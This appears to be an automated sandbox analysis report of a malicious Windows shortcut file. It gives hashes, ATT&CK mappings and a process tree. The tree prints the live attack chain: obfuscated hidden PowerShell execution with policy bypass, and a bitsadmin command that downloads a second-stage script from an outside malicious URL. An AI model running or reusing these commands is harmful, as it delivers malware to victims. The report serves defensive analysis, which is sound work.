eb3bb6a7ec6a23a279455af28aa725f734a13cf7983029c2fdec2cefaebd1f82

Analysis

max time kernel
148s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26/05/2024, 18:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RXC_950_9203.J5-order.zip.lnk
Size

3KB
MD5

396b40670632d66aa9d75333fb3a18e5
SHA1

a2ed27e19991e747c9664f6e2d98f95b1837a59f
SHA256

f60acfaf318ccc255f1c96a90605dbd06f9638a806a42e8534b3d0782de329d7
SHA512

630527cce2f8b5f91bf4deedfb44c3f88e34d907361c41f3295301e65984b891b2315b00346419daa892a43a8132c5f4985af2f9a11e20ddf1abe52773784584

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2868	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
3400	bitsadmin.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2868	powershell.exe
2868	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2868	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 896 wrote to memory of 540	896	cmd.exe	83
PID 896 wrote to memory of 540	896	cmd.exe	83
PID 540 wrote to memory of 2088	540	cmd.exe	84
PID 540 wrote to memory of 2088	540	cmd.exe	84
PID 540 wrote to memory of 1652	540	cmd.exe	85
PID 540 wrote to memory of 1652	540	cmd.exe	85
PID 1652 wrote to memory of 2868	1652	cmd.exe	86
PID 1652 wrote to memory of 2868	1652	cmd.exe	86
PID 2868 wrote to memory of 4412	2868	powershell.exe	95
PID 2868 wrote to memory of 4412	2868	powershell.exe	95
PID 4412 wrote to memory of 3400	4412	cmd.exe	97
PID 4412 wrote to memory of 3400	4412	cmd.exe	97

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RXC_950_9203.J5-order.zip.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c findstr /s jsdhfYYt C:\Users\Admin\\*.lnk > C:\Users\Admin\Documents\meli7.ps1& set dd="h"& cmd /c powers%dd%ell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\meli7.ps1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:540
- - C:\Windows\system32\findstr.exe
    findstr /s jsdhfYYt C:\Users\Admin\\*.lnk
    3⤵
    PID:2088
- - C:\Windows\system32\cmd.exe
    cmd /c powers%dd%ell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\meli7.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powers"h"ell -w hidden -ep bypass -File C:\Users\Admin\\Documents\\meli7.ps1
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2868
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer jsdhfYYt /download /priority FOREGROUND "https://mitchamcapital.com/sedr12/t1.ps1" C:\Users\Admin\AppData\Roaming\\ruxlWwNFVnoJbU.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4412
      - C:\Windows\system32\bitsadmin.exe
        
        bitsadmin /transfer jsdhfYYt /download /priority FOREGROUND "https://mitchamcapital.com/sedr12/t1.ps1" C:\Users\Admin\AppData\Roaming\\ruxlWwNFVnoJbU.ps1
        6⤵
        Download via BitsAdmin
        
        PID:3400

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

BITS Jobs

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

T1197

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nmo1zpfm.ozo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Documents\meli7.ps1

Filesize
1KB

MD5
4d19067fc5d9be62ed711a5d22b4013d

SHA1
f05e42f1739134d85d986ff716a45b7564c49d51

SHA256
e95ea4a0e1aecae0897ac5529f1b4126cb275ab78645ae35d7577df137509f45

SHA512
0dfe38e7037f57379ced342438e2c9f6e98c25f914044680a12cd1359422e579c5c88c37d4e002287a772fe77f99879ab97662698ff0f2bc3c3cc10add2c14c2

Download Submit
memory/2868-1-0x00007FF84D993000-0x00007FF84D995000-memory.dmp

Filesize
8KB

Download
memory/2868-7-0x000002EB232A0000-0x000002EB232C2000-memory.dmp

Filesize
136KB

Download
memory/2868-12-0x00007FF84D990000-0x00007FF84E451000-memory.dmp

Filesize
10.8MB

Download
memory/2868-13-0x00007FF84D990000-0x00007FF84E451000-memory.dmp

Filesize
10.8MB

Download
memory/2868-16-0x00007FF84D990000-0x00007FF84E451000-memory.dmp

Filesize
10.8MB

Download
memory/2868-17-0x00007FF84D993000-0x00007FF84D995000-memory.dmp

Filesize
8KB

Download
memory/2868-18-0x00007FF84D990000-0x00007FF84E451000-memory.dmp

Filesize
10.8MB

Download